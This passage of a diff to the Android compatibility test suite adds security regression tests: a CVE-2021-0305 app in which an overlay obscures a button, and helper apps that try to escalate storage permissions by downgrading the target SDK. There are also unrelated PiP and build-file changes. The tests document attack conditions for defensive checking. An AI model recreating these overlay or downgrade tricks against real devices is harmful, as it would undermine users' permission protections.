+ if(button==null){
+ //check the next button
+ continue;
+ }
+
+ switch(button){
+ case "Test Button" :
+ o.click();
+ clicked=true;
+ Log.i("CVE", "clicked: Test Button");
+ break;
+ default :
+ //check the next button
+ continue;
+ }
+
+ //A button this test is looking for just got pressed.
+ //Ignore remaining buttons
+ break;
+ }
+
+ Log.d("CVE", "testClick() end");
+ assertFalse(clicked);
+ Log.d("CVE", "testClick() passed");
+ }
+}
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java
new file mode 100644
index 0000000..50a1622
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/MainActivity.java
@@ -0,0 +1,64 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0305;
+
+import android.app.Activity;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.Manifest.permission;
+import android.os.Bundle;
+import android.os.Handler;
+import android.view.View;
+import android.widget.EditText;
+import android.widget.TextView;
+import android.util.Log;
+import android.widget.Button;
+import android.os.SystemClock;
+import static android.content.Intent.FLAG_ACTIVITY_NO_ANIMATION;
+
+
+public class MainActivity extends Activity {
+
+ private static final int REQUEST_CAMERA_PERMISSION = 0;
+ Button testButton1;
+
+ @Override
+ public void onCreate(Bundle b) {
+ super.onCreate(b);
+ Log.e("CVE", "onCreate");
+ setContentView(R.layout.activity_main);
+ testButton1 = (Button) findViewById(R.id.testButton1);//get id of button
+
+ testButton1.setOnClickListener(new View.OnClickListener() {
+ @Override
+ public void onClick(View view) {
+ Log.d("CVE", "button click received");
+ }
+ });
+ }
+
+ @Override
+ public void onEnterAnimationComplete() {
+ super.onEnterAnimationComplete();
+ Log.d("CVE", "MainActivity.onEnterAnimationComplete()");
+
+ //open OverlayActivity to obstruct MainActivity
+ Intent intent = new Intent(this, OverlayActivity.class);
+ intent.setFlags(FLAG_ACTIVITY_NO_ANIMATION);
+ startActivity(intent);
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java
new file mode 100644
index 0000000..c320e5a
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0305/src/android/security/cts/CVE_2021_0305/OverlayActivity.java
@@ -0,0 +1,4 @@
+package android.security.cts.CVE_2021_0305;
+import android.app.Activity;
+
+public class OverlayActivity extends Activity {}
diff --git a/tests/app/src/android/app/cts/ApplicationTest.java b/tests/app/src/android/app/cts/ApplicationTest.java
new file mode 100644
index 0000000..548a37f
--- /dev/null
+++ b/tests/app/src/android/app/cts/ApplicationTest.java
@@ -0,0 +1,97 @@
+/*
+ * Copyright (C) 2008 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.app.cts;
+
+import static org.mockito.Mockito.CALLS_REAL_METHODS;
+import static org.mockito.Mockito.mock;
+import static org.mockito.Mockito.verify;
+
+import android.app.Activity;
+import android.app.Application;
+import android.app.Instrumentation;
+import android.app.stubs.MockApplication;
+import android.app.stubs.MockApplicationActivity;
+import android.content.ComponentCallbacks2;
+import android.content.Context;
+import android.content.Intent;
+import android.test.InstrumentationTestCase;
+
+import com.android.compatibility.common.util.SystemUtil;
+
+/**
+ * Test {@link Application}.
+ */
+public class ApplicationTest extends InstrumentationTestCase {
+ private static final String ERASE_FONT_SCALE_CMD = "settings delete system font_scale";
+ // 1.2 is an arbitrary value.
+ private static final String PUT_FONT_SCALE_CMD = "settings put system font_scale 1.2";
+
+ @Override
+ public void tearDown() throws Exception {
+ SystemUtil.runShellCommand(getInstrumentation(), ERASE_FONT_SCALE_CMD);
+ }
+
+
+ public void testApplication() throws Throwable {
+ final Instrumentation instrumentation = getInstrumentation();
+ final Context targetContext = instrumentation.getTargetContext();
+
+ final Intent intent = new Intent(targetContext, MockApplicationActivity.class);
+ intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+
+ final Activity activity = instrumentation.startActivitySync(intent);
+ final MockApplication mockApp = (MockApplication) activity.getApplication();
+ assertTrue(mockApp.isConstructorCalled);
+ assertTrue(mockApp.isOnCreateCalled);
+ toggleFontScale();
+ assertTrue(waitForOnConfigurationChange(mockApp));
+ }
+
+ public void testOnTrimMemory() {
+ final int level = 2;
+ Application app = new Application();
+ ComponentCallbacks2 mockCallBack2 = mock(ComponentCallbacks2.class, CALLS_REAL_METHODS);
+ app.registerComponentCallbacks(mockCallBack2);
+
+ app.onTrimMemory(level);
+
+ verify(mockCallBack2).onTrimMemory(level);
+ }
+
+ // Font scale is a global configuration.
+ // This function will delete any previous font scale changes, apply one, and remove it.
+ private void toggleFontScale() throws Throwable {
+ SystemUtil.runShellCommand(getInstrumentation(), ERASE_FONT_SCALE_CMD);
+ getInstrumentation().waitForIdleSync();
+ SystemUtil.runShellCommand(getInstrumentation(), PUT_FONT_SCALE_CMD);
+ getInstrumentation().waitForIdleSync();
+ SystemUtil.runShellCommand(getInstrumentation(), ERASE_FONT_SCALE_CMD);
+ }
+
+ // Wait for a maximum of 5 seconds for global config change to occur.
+ private boolean waitForOnConfigurationChange(MockApplication mockApp) throws Throwable {
+ int retriesLeft = 5;
+ while(retriesLeft-- > 0) {
+ if (mockApp.isOnConfigurationChangedCalled) {
+ return true;
+ }
+ Thread.sleep(1000);
+ }
+ return false;
+ }
+
+}
diff --git a/tests/backup/Android.bp b/tests/backup/Android.bp
index bc6d77e..c1f78ed 100644
--- a/tests/backup/Android.bp
+++ b/tests/backup/Android.bp
@@ -37,6 +37,7 @@
srcs: ["src/**/*.java"],
test_suites: [
"cts",
+ "mts-permission",
"general-tests",
],
sdk_version: "test_current",
diff --git a/tests/framework/base/windowmanager/app/AndroidManifest.xml b/tests/framework/base/windowmanager/app/AndroidManifest.xml
index c6ab9f2..7a44a00 100755
--- a/tests/framework/base/windowmanager/app/AndroidManifest.xml
+++ b/tests/framework/base/windowmanager/app/AndroidManifest.xml
@@ -172,6 +172,15 @@
android:minHeight="80dp"
/>
</activity>
+ <activity android:name=".PipActivityWithTinyMinimalSize"
+ android:resizeableActivity="false"
+ android:supportsPictureInPicture="true"
+ android:configChanges="orientation|screenSize|smallestScreenSize|screenLayout"
+ android:exported="true"
+ android:taskAffinity="nobody.but.PipActivity">
+ <layout android:minWidth="1dp"
+ android:minHeight="1dp"/>
+ </activity>
<activity android:name=".FreeformActivity"
android:resizeableActivity="true"
android:taskAffinity="nobody.but.FreeformActivity"
diff --git a/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java b/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java
index cc7ed6d..3feb5e9 100644
--- a/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java
+++ b/tests/framework/base/windowmanager/app/src/android/server/wm/app/Components.java
@@ -80,6 +80,8 @@
public static final ComponentName PIP_ACTIVITY2 = component("PipActivity2");
public static final ComponentName PIP_ACTIVITY_WITH_MINIMAL_SIZE = component(
"PipActivityWithMinimalSize");
+ public static final ComponentName PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE = component(
+ "PipActivityWithTinyMinimalSize");
public static final ComponentName PIP_ACTIVITY_WITH_SAME_AFFINITY =
component("PipActivityWithSameAffinity");
public static final ComponentName PIP_ON_STOP_ACTIVITY = component("PipOnStopActivity");
diff --git a/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java b/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java
new file mode 100644
index 0000000..cd1c625
--- /dev/null
+++ b/tests/framework/base/windowmanager/app/src/android/server/wm/app/PipActivityWithTinyMinimalSize.java
@@ -0,0 +1,24 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License
+ */
+
+package android.server.wm.app;
+
+/**
+ * An activity that has the same behavior as {@link PipActivity} and specifies
+ * minimal dimension in its manifest which is tiny and smaller than the allowed minimum.
+ */
+public class PipActivityWithTinyMinimalSize extends PipActivity {
+}
diff --git a/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java b/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java
index b6d7a8c..b1579f2 100644
--- a/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java
+++ b/tests/framework/base/windowmanager/src/android/server/wm/PinnedStackTests.java
@@ -30,6 +30,7 @@
import static android.server.wm.WindowManagerState.STATE_PAUSED;
import static android.server.wm.WindowManagerState.STATE_RESUMED;
import static android.server.wm.WindowManagerState.STATE_STOPPED;
+import static android.server.wm.WindowManagerState.dpToPx;
import static android.server.wm.app.Components.ALWAYS_FOCUSABLE_PIP_ACTIVITY;
import static android.server.wm.app.Components.LAUNCHING_ACTIVITY;
import static android.server.wm.app.Components.LAUNCH_ENTER_PIP_ACTIVITY;
@@ -39,6 +40,7 @@
import static android.server.wm.app.Components.PIP_ACTIVITY2;
import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_MINIMAL_SIZE;
import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_SAME_AFFINITY;
+import static android.server.wm.app.Components.PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE;
import static android.server.wm.app.Components.PIP_ON_STOP_ACTIVITY;
import static android.server.wm.app.Components.PipActivity.ACTION_ENTER_PIP;
import static android.server.wm.app.Components.PipActivity.ACTION_FINISH;
@@ -147,6 +149,8 @@
private static final int MAX_ASPECT_RATIO_NUMERATOR = 239;
private static final int MAX_ASPECT_RATIO_DENOMINATOR = 100;
private static final int ABOVE_MAX_ASPECT_RATIO_NUMERATOR = MAX_ASPECT_RATIO_NUMERATOR + 1;
+ // Corresponds to com.android.internal.R.dimen.overridable_minimal_size_pip_resizable_task
+ private static final int OVERRIDABLE_MINIMAL_SIZE_PIP_RESIZABLE_TASK = 48;
@Before
@Override
@@ -253,8 +257,6 @@
assertPinnedStackActivityIsInDisplayBounds(PIP_ACTIVITY);
}
- // TODO: launch/size pip to a size smaller than limitation and verify the minWidth/minHeight
- // is respected after b/149338177.
@Test
public void testEnterPipWithMinimalSize() throws Exception {
// Launch a PiP activity with minimal size specified
@@ -279,6 +281,29 @@
}
@Test
+ public void testEnterPipWithTinyMinimalSize() throws Exception {
+ // Launch a PiP activity with minimal size specified and smaller than allowed minimum
+ launchActivity(PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE, EXTRA_ENTER_PIP, "true");
+ // Wait for animation complete since we are comparing size
+ waitForEnterPipAnimationComplete(PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE);
+ assertPinnedStackExists();
+
+ final WindowManagerState.WindowState windowState = getWindowState(
+ PIP_ACTIVITY_WITH_TINY_MINIMAL_SIZE);
+ final WindowManagerState.DisplayContent display = mWmState.getDisplay(
+ windowState.getDisplayId());
+ final int overridableMinSize = dpToPx(
+ OVERRIDABLE_MINIMAL_SIZE_PIP_RESIZABLE_TASK, display.getDpi());
+
+ // compare the bounds to verify that it's no smaller than allowed minimum on both dimensions
+ final Rect pipBounds = getPinnedStackBounds();
+ assertTrue("Pinned task bounds " + pipBounds + " isn't smaller than minimal "
+ + overridableMinSize + " on both dimensions",
+ pipBounds.width() >= overridableMinSize
+ && pipBounds.height() >= overridableMinSize);
+ }
+
+ @Test
public void testEnterPipAspectRatioMin() throws Exception {
testEnterPipAspectRatio(MIN_ASPECT_RATIO_NUMERATOR, MIN_ASPECT_RATIO_DENOMINATOR);
}
diff --git a/tests/libcore/okhttp/Android.bp b/tests/libcore/okhttp/Android.bp
index 7b20ee2..da05fe2 100644
--- a/tests/libcore/okhttp/Android.bp
+++ b/tests/libcore/okhttp/Android.bp
@@ -44,6 +44,6 @@
test_suites: [
"cts",
"general-tests",
- "mts",
+ "mts-conscrypt",
],
}
diff --git a/tests/tests/cronet/Android.bp b/tests/tests/cronet/Android.bp
index 947d5c0..fc8ec7f 100644
--- a/tests/tests/cronet/Android.bp
+++ b/tests/tests/cronet/Android.bp
@@ -34,7 +34,7 @@
test_suites: [
"cts",
"general-tests",
- "mts",
+ "mts-cronet",
],
}
diff --git a/tests/tests/media/Android.bp b/tests/tests/media/Android.bp
index ce6ff06..d2963c6 100644
--- a/tests/tests/media/Android.bp
+++ b/tests/tests/media/Android.bp
@@ -88,7 +88,7 @@
test_suites: [
"cts",
"general-tests",
- "mts",
+ "mts-media",
],
host_required: ["cts-dynamic-config"],
min_sdk_version: "29",
diff --git a/tests/tests/mediaparser/Android.bp b/tests/tests/mediaparser/Android.bp
index b159b06..6c9ba6f 100644
--- a/tests/tests/mediaparser/Android.bp
+++ b/tests/tests/mediaparser/Android.bp
@@ -47,4 +47,5 @@
"android.test.runner",
],
sdk_version: "test_current",
+
}
diff --git a/tests/tests/mediastress/Android.bp b/tests/tests/mediastress/Android.bp
index 9977c084..48fe6a6 100644
--- a/tests/tests/mediastress/Android.bp
+++ b/tests/tests/mediastress/Android.bp
@@ -23,7 +23,7 @@
test_suites: [
"cts",
"general-tests",
- "mts",
+ "mts-media",
],
// Include both the 32 and 64 bit versions
compile_multilib: "both",
diff --git a/tests/tests/notificationlegacy/notificationlegacy29/Android.bp b/tests/tests/notificationlegacy/notificationlegacy29/Android.bp
index ba4b265..179a1bd 100644
--- a/tests/tests/notificationlegacy/notificationlegacy29/Android.bp
+++ b/tests/tests/notificationlegacy/notificationlegacy29/Android.bp
@@ -34,7 +34,7 @@
test_suites: [
"cts",
"general-tests",
- "mts"
+ "mts-extservices"
],
sdk_version: "test_current",
target_sdk_version: "29",
diff --git a/tests/tests/packageinstaller/emptytestapp/Android.bp b/tests/tests/packageinstaller/emptytestapp/Android.bp
index 187ec9d..b336c87 100644
--- a/tests/tests/packageinstaller/emptytestapp/Android.bp
+++ b/tests/tests/packageinstaller/emptytestapp/Android.bp
@@ -26,5 +26,6 @@
"arcts",
"cts",
"general-tests",
+ "sts",
],
}
diff --git a/tests/tests/packageinstaller/uninstall/Android.bp b/tests/tests/packageinstaller/uninstall/Android.bp
index edd4588..537dad7 100644
--- a/tests/tests/packageinstaller/uninstall/Android.bp
+++ b/tests/tests/packageinstaller/uninstall/Android.bp
@@ -33,5 +33,6 @@
test_suites: [
"cts",
"general-tests",
+ "sts",
],
}
diff --git a/tests/tests/packagewatchdog/Android.bp b/tests/tests/packagewatchdog/Android.bp
index 1aaaf7a..53e5efb 100644
--- a/tests/tests/packagewatchdog/Android.bp
+++ b/tests/tests/packagewatchdog/Android.bp
@@ -26,7 +26,7 @@
"cts",
"vts",
"general-tests",
- "mts"
+ "mts-extservices"
],
libs: ["android.test.base"],
static_libs: [
diff --git a/tests/tests/permission/AndroidTest.xml b/tests/tests/permission/AndroidTest.xml
index a7309c3..cd26a5f 100644
--- a/tests/tests/permission/AndroidTest.xml
+++ b/tests/tests/permission/AndroidTest.xml
@@ -67,6 +67,9 @@
<option name="push" value="CtsInstallPermissionEscalatorApp.apk->/data/local/tmp/cts/permissions/CtsInstallPermissionEscalatorApp.apk" />
<option name="push" value="CtsAppThatRequestsOneTimePermission.apk->/data/local/tmp/cts/permissions/CtsAppThatRequestsOneTimePermission.apk" />
<option name="push" value="AppThatDefinesUndefinedPermissionGroupElement.apk->/data/local/tmp/cts/permissions/AppThatDefinesUndefinedPermissionGroupElement.apk" />
+ <option name="push" value="CtsStorageEscalationApp28.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp28.apk" />
+ <option name="push" value="CtsStorageEscalationApp29Full.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp29Full.apk" />
+ <option name="push" value="CtsStorageEscalationApp29Scoped.apk->/data/local/tmp/cts/permissions/CtsStorageEscalationApp29Scoped.apk" />
</target_preparer>
<!-- Remove additional apps if installed -->
diff --git a/tests/tests/permission/StorageEscalationApp28/Android.bp b/tests/tests/permission/StorageEscalationApp28/Android.bp
new file mode 100644
index 0000000..0b256ee
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp28/Android.bp
@@ -0,0 +1,29 @@
+//
+// Copyright (C) 2016 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CtsStorageEscalationApp28",
+ certificate: ":cts-testkey2",
+ test_suites: [
+ "cts",
+ "general-tests",
+ "sts",
+ ],
+}
diff --git a/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml
new file mode 100644
index 0000000..f1bd315
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp28/AndroidManifest.xml
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!--
+ ~ Copyright (C) 2016 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+
+<manifest
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.permission3.cts.storageescalation">
+
+ <uses-sdk android:minSdkVersion="28" android:targetSdkVersion="28" />
+
+ <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" />
+
+ <application android:hasCode="false" />
+</manifest>
diff --git a/tests/tests/permission/StorageEscalationApp29Full/Android.bp b/tests/tests/permission/StorageEscalationApp29Full/Android.bp
new file mode 100644
index 0000000..4b2a7ad
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp29Full/Android.bp
@@ -0,0 +1,29 @@
+//
+// Copyright (C) 2016 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CtsStorageEscalationApp29Full",
+ certificate: ":cts-testkey2",
+ test_suites: [
+ "cts",
+ "general-tests",
+ "sts",
+ ],
+}
diff --git a/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml
new file mode 100644
index 0000000..73a7110
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp29Full/AndroidManifest.xml
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!--
+ ~ Copyright (C) 2016 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+
+<manifest
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.permission3.cts.storageescalation">
+
+ <uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" />
+
+ <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" />
+
+ <application android:hasCode="false" android:requestLegacyExternalStorage="true"/>
+</manifest>
diff --git a/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp b/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp
new file mode 100644
index 0000000..484d313
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp29Scoped/Android.bp
@@ -0,0 +1,29 @@
+//
+// Copyright (C) 2016 The Android Open Source Project
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+
+package {
+ default_applicable_licenses: ["Android-Apache-2.0"],
+}
+
+android_test_helper_app {
+ name: "CtsStorageEscalationApp29Scoped",
+ certificate: ":cts-testkey2",
+ test_suites: [
+ "cts",
+ "general-tests",
+ "sts",
+ ],
+}
diff --git a/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml b/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml
new file mode 100644
index 0000000..c3812fe
--- /dev/null
+++ b/tests/tests/permission/StorageEscalationApp29Scoped/AndroidManifest.xml
@@ -0,0 +1,30 @@
+<?xml version="1.0" encoding="utf-8"?>
+
+<!--
+ ~ Copyright (C) 2016 The Android Open Source Project
+ ~
+ ~ Licensed under the Apache License, Version 2.0 (the "License");
+ ~ you may not use this file except in compliance with the License.
+ ~ You may obtain a copy of the License at
+ ~
+ ~ http://www.apache.org/licenses/LICENSE-2.0
+ ~
+ ~ Unless required by applicable law or agreed to in writing, software
+ ~ distributed under the License is distributed on an "AS IS" BASIS,
+ ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ ~ See the License for the specific language governing permissions and
+ ~ limitations under the License.
+ -->
+
+<manifest
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ package="android.permission3.cts.storageescalation">
+
+ <uses-sdk android:minSdkVersion="29" android:targetSdkVersion="29" />
+
+ <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
+ <uses-permission android:name="android.permission.ACCESS_MEDIA_LOCATION" />
+
+ <application android:hasCode="false" android:requestLegacyExternalStorage="false"/>
+</manifest>
diff --git a/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java b/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java
index 1c834ce..5db94c1 100644
--- a/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java
+++ b/tests/tests/permission/src/android/permission/cts/SplitPermissionTest.java
@@ -18,10 +18,8 @@
import static android.Manifest.permission.ACCESS_BACKGROUND_LOCATION;
import static android.Manifest.permission.ACCESS_COARSE_LOCATION;
-import static android.Manifest.permission.ACCESS_MEDIA_LOCATION;
import static android.Manifest.permission.READ_CALL_LOG;
import static android.Manifest.permission.READ_CONTACTS;
-import static android.Manifest.permission.READ_EXTERNAL_STORAGE;
import static android.app.AppOpsManager.MODE_FOREGROUND;
import static android.content.pm.PackageManager.FLAG_PERMISSION_REVIEW_REQUIRED;
import static android.content.pm.PackageManager.FLAG_PERMISSION_USER_SET;
diff --git a/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt b/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt
new file mode 100644
index 0000000..2e67179
--- /dev/null
+++ b/tests/tests/permission/src/android/permission/cts/StorageEscalationTest.kt
@@ -0,0 +1,94 @@
+/*
+ * Copyright (C) 2020 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.permission.cts
+
+import android.Manifest.permission.ACCESS_MEDIA_LOCATION
+import android.Manifest.permission.READ_EXTERNAL_STORAGE
+import android.Manifest.permission.WRITE_EXTERNAL_STORAGE
+import android.app.Instrumentation
+import android.app.UiAutomation
+import android.content.Context
+import android.content.pm.PackageManager
+import android.platform.test.annotations.SecurityTest
+import androidx.test.platform.app.InstrumentationRegistry
+import com.android.compatibility.common.util.SystemUtil
+import org.junit.After
+import org.junit.Assert
+import org.junit.Before
+import org.junit.Test
+
+class StorageEscalationTest {
+ companion object {
+ private const val APK_DIRECTORY = "/data/local/tmp/cts/permissions"
+ const val APP_APK_PATH_28 = "$APK_DIRECTORY/CtsStorageEscalationApp28.apk"
+ const val APP_APK_PATH_29_SCOPED = "$APK_DIRECTORY/CtsStorageEscalationApp29Scoped.apk"
+ const val APP_APK_PATH_29_FULL = "$APK_DIRECTORY/CtsStorageEscalationApp29Full.apk"
+ const val APP_PACKAGE_NAME = "android.permission3.cts.storageescalation"
+ const val DELAY_TIME_MS: Long = 200
+ val permissions = listOf<String>(READ_EXTERNAL_STORAGE, WRITE_EXTERNAL_STORAGE,
+ ACCESS_MEDIA_LOCATION)
+ }
+
+ private val instrumentation: Instrumentation = InstrumentationRegistry.getInstrumentation()
+ private val context: Context = instrumentation.context
+ private val uiAutomation: UiAutomation = instrumentation.uiAutomation
+
+ @Before
+ @After
+ fun uninstallApp() {
+ SystemUtil.runShellCommand("pm uninstall $APP_PACKAGE_NAME")
+ }
+
+ private fun installPackage(apk: String) {
+ SystemUtil.runShellCommand("pm install -r $apk")
+ }
+
+ private fun grantStoragePermissions() {
+ for (permName in permissions) {
+ uiAutomation.grantRuntimePermission(APP_PACKAGE_NAME, permName)
+ }
+ }
+
+ private fun assertStoragePermissionState(granted: Boolean) {
+ for (permName in permissions) {
+ Assert.assertEquals(granted, context.packageManager.checkPermission(permName,
+ APP_PACKAGE_NAME) == PackageManager.PERMISSION_GRANTED)
+ }
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2021-03")
+ fun testCannotEscalateWithSdkDowngrade() {
+ runStorageEscalationTest(APP_APK_PATH_29_SCOPED, APP_APK_PATH_28)
+ }
+
+ @Test
+ @SecurityTest(minPatchLevel = "2021-03")
+ fun testCannotEscalateWithNewManifestLegacyRequest() {
+ runStorageEscalationTest(APP_APK_PATH_29_SCOPED, APP_APK_PATH_29_FULL)
+ }
+
+ private fun runStorageEscalationTest(startPackageApk: String, finishPackageApk: String) {
+ installPackage(startPackageApk)
+ grantStoragePermissions()
+ assertStoragePermissionState(granted = true)
+ installPackage(finishPackageApk)
+ // permission revoke is async, so wait a short period
+ Thread.sleep(DELAY_TIME_MS)
+ assertStoragePermissionState(granted = false)
+ }
+}
diff --git a/tests/tests/permission2/res/raw/android_manifest.xml b/tests/tests/permission2/res/raw/android_manifest.xml
index 336ab7c..16bc377 100644
--- a/tests/tests/permission2/res/raw/android_manifest.xml
+++ b/tests/tests/permission2/res/raw/android_manifest.xml
@@ -478,6 +478,8 @@
<protected-broadcast android:name="android.app.action.ACTION_PASSWORD_FAILED" />
<protected-broadcast android:name="android.app.action.ACTION_PASSWORD_SUCCEEDED" />
<protected-broadcast android:name="com.android.server.ACTION_EXPIRED_PASSWORD_NOTIFICATION" />
+ <protected-broadcast android:name="com.android.server.ACTION_PROFILE_OFF_DEADLINE" />
+ <protected-broadcast android:name="com.android.server.ACTION_TURN_PROFILE_ON_NOTIFICATION" />
<protected-broadcast android:name="android.intent.action.MANAGED_PROFILE_ADDED" />
<protected-broadcast android:name="android.intent.action.MANAGED_PROFILE_UNLOCKED" />
